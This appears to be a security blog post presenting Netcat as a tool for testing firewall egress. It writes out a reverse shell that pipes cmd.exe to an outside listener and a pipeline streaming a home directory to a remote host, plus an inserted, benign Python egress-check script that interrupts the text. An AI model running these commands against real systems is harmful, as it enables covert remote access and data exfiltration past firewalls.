Swiss Army Knife for TCP/IP
Last week I wrote about the Vyatta firewall, by far one of the best free firewall packages out there today. This week, I’ll discuss a free, often overlooked security tool referred to as the Swiss Army knife for TCP/IP.
The tool I’m thinking of is “Netcat”, an application capable of reading from and writing to network connections and redirecting or piping that input/output to a host of your choosing. Originally, an individual called “Hobbit” wrote Netcat for Unix; it was quickly ported to Windows by Weld Pond, making Netcat a cross-platform tool. Today ‘Netcat’ is available for Linux, Mac and Windows. The reason it’s called the Swiss Army knife for TCP/IP is that it’s so darn flexible in its use. In its simplest form, Netcat can be used to establish reverse shell connections through home or corporate firewalls.
A reverse connection involves an active ‘Netcat’ connection originating from a source host, typically on an inside trusted network, happily traversing a firewall to a listening host on the outside untrusted network and piping application output from source to target. The beauty of Netcat really shines when you realize that you can have it listen on any port, making it very flexible and useful in testing firewall egress rules. For example:
From a Windows host outside the firewall (external network), run ‘Netcat’ listening on port 53:
nc -L -p 53
Then from inside the firewall (internal network), connect to the listening machine, specifying the target IP address and port on the outside network. “-e cmd.exe” executes the Windows command shell:
nc <IP ADDRESS> 53 -e cmd.exe
If you’ve done things correctly you should see a command shell from the internal host displayed on the listening host outside your internal network. At this point ‘Netcat’ will gladly pipe all commands and command output between the two hosts, effectively bypassing any security devices. This type of connection is called a reverse connection because the internal host initiates the connection to an outside host; typically outside clients initiate connections to internal servers. One reason I’ve chosen port 53 is that it is often given egress privileges through corporate firewalls. Don’t forget ‘Netcat’ will happily play with both TCP and UDP.
Netcat can be used for forward connections and reverse connections, but also as a simple data transfer agent, and it doesn’t really matter which end is the listener and which end is the client: input at one side arrives at the other side as output.
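To check egress rules the way the post describes, but without needing Netcat on the probing host, here is an added example (not from the original post) that reproduces the connect-and-close check of `nc -z -w 3 host port` with Python’s socket module; the candidate port list and the local self-test listener are assumptions made for this example.

```python
import socket
import threading

# Ports the post singles out (53 because DNS is usually allowed out, 443 for
# the transfer example); the list itself is an assumption for this example.
CANDIDATE_PORTS = [53, 443]


def port_reachable(host, port, timeout=3.0):
    """True if a TCP connection to host:port completes, like `nc -z -w 3`;
    the socket closes right away so only the allow/deny decision is seen."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable: all read as blocked
        return False


def check_egress(host, ports=CANDIDATE_PORTS, timeout=3.0):
    """Map each port to whether an outbound connection from here succeeded."""
    return {port: port_reachable(host, port, timeout) for port in ports}


def start_local_listener():
    """Throwaway listener on 127.0.0.1, standing in for the external
    `nc -l -p <port>` host so the check can be exercised offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                srv.accept()[0].close()  # accept, then drop the connection
            except OSError:
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def unused_local_port():
    """A port nothing listens on, to confirm the check reports 'blocked'."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # Self-demo: one allowed port (local listener) and one blocked port.
    allowed, blocked = start_local_listener(), unused_local_port()
    for port, ok in check_egress("127.0.0.1", [allowed, blocked]).items():
        print(f"port {port}: {'allowed' if ok else 'blocked'}")
```

Point `check_egress` at a listener you control outside the firewall to see which of the candidate ports the egress rules actually let through.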
nc -l -p 443 | uncompress -c | tar xvfp -
and then on the other side:
tar cfp - /home/dir | compress -c | nc -w 3 <IP ADDRESS> 443
The example above archives and compresses /home/dir on one machine and sends the stream through ‘Netcat’ to the listening host, which uncompresses it and extracts the archive, recreating the directory tree there.
Netcat can be used as a Telnet client and a one-time web server; however, by far its claim to fame has come from the hacker community. Some consider Netcat a hacker tool only used to establish reverse connections. However, I don’t consider ‘Netcat’ an evil hacker tool; in fact I consider ‘Netcat’ a white-hat testing tool. ‘Netcat’ can help in testing your firewall egress rules and traffic anti-spoofing tools. Go ahead and give Netcat a try in your environment, and next week I’ll discuss how you can protect yourself against reverse connections via Netcat.